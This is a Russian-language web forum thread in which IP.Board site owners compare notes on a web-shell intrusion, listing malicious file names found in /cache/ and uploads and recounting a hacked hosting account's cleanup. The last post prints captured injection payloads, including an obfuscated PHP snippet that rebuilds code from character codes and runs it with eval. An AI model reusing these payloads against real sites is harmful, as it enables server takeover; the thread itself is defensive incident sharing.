Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...

Recommended Posts

Ритсука зачем палишь разновидности? :)

 

Всплывает старая истина: запрет на web-доступ к /cache/ - всегда хорошая идея)

Обходится как два пальца.

Share this post


Link to post
Share on other sites

Ёёё, а тут оказывается целая тема, почему не видел???? :o Сидим на IPB как на мине замедленного действия, и когда она сработает, Бог его знает.. :(

Share this post


Link to post
Share on other sites

Я сейчас в Минске и не имею доступа... Проверьте нас, кто может. Один sh.php я до патченья тут удаляла из папки кэш.

Share this post


Link to post
Share on other sites

И еще были:

 

/cache/9ed28f49e4a432d582c27def5cb172e3.php

/cache/cache_clean.php

Share this post


Link to post
Share on other sites

О, да тут еще новый патч не стоит. Залил новый.

  • Upvote 2

Share this post


Link to post
Share on other sites

Спасибо

Share this post


Link to post
Share on other sites

Так же замечено, что заливают шелл в uploads (uploads/profile) под видом jpg файла, в большинстве случаев с названием photo-128.jpg размер ~67.38 KB. В принципе такой шелл бесполезен, так как php там не исполняется (в нормальной среде), но по каким-то, пока необъясним причинам, у некоторых пользователей форум все же их исполняет. Поэтому следует иметь ввиду и проверится.

Share this post


Link to post
Share on other sites

А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет, выполнять через этот шел удаление всех шелл-файлов и установку патча :)

Share this post


Link to post
Share on other sites

Добавлю в коллекцию:

/cache/2f617aab0a2e830c7370a745b88af170.php

/cache/ipbcache.php

/cache/view-cache.php

 

Содержимое то же.

Share this post


Link to post
Share on other sites

А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет,

Ага, а если не найдет - залить. :) И повесить скрипт на ипбскинсе

Share this post


Link to post
Share on other sites
Ага, а если не найдет - залить.

И тоже пропатчить, а потом удалить :)

Share this post


Link to post
Share on other sites

В другой теме обещал, здесь выкладываю. Может кому будет интересно и полезно на будущее.

 

Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта, где как раз в папке forum стоит IPB:

post-5412-0-79261300-1352429499_thumb.png

В корне стоит ABO.CMS

Подчеркнул "лишние" папки и файлы, а также стандартные, если их подменили.

 

Содержимое одной из "лишних" папок:

post-5412-0-87685600-1352429507_thumb.png

 

Тут директория кеша IPB, там видны самые "старые" чужеродные файлы, датируются от 16:00 4 ноября. Это самые "старые" занесенные на площадку файлы, видимо с них все и началось:

post-5412-0-95609500-1352429514_thumb.png

 

Выгребать столько дерьма (в каждую из "нормальных" обязательно папок что-то напихали) было нереально, все равно была опасность оставить где-то "хвостик" заразы. Выручил бекап за утро 4 ноября, с предварительным удалением всего что есть на площадке (не только в директории www).

 

 

Вот что странно, а как зараза вылезла выше директории сайта, захватила другие сайты этого акканта?

 

Судя по дате заражения других сайтов этого пользователя, видимо все же посадили (через его же сайт) заразу на комп, откуда заходили в панель хостинга (сейчас, пока распаковывал бекап, антивирус постоянно ругался и поместил в карантин около 20 файлов, их на скринах не видно, все они лежали в корне сайта).

Share this post


Link to post
Share on other sites

(Продолжение)

 

Содержимое wchckd.php:

==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?print(512314);print(512314);die;?> ===================================
==============================================================================

Содержимое файла wchckd4.php:

 

 

==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?$d=substr(8,1);foreach(array(36,39,112,49,39,93,59,36,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,11,6,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit;?> ===================================
==============================================================================

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...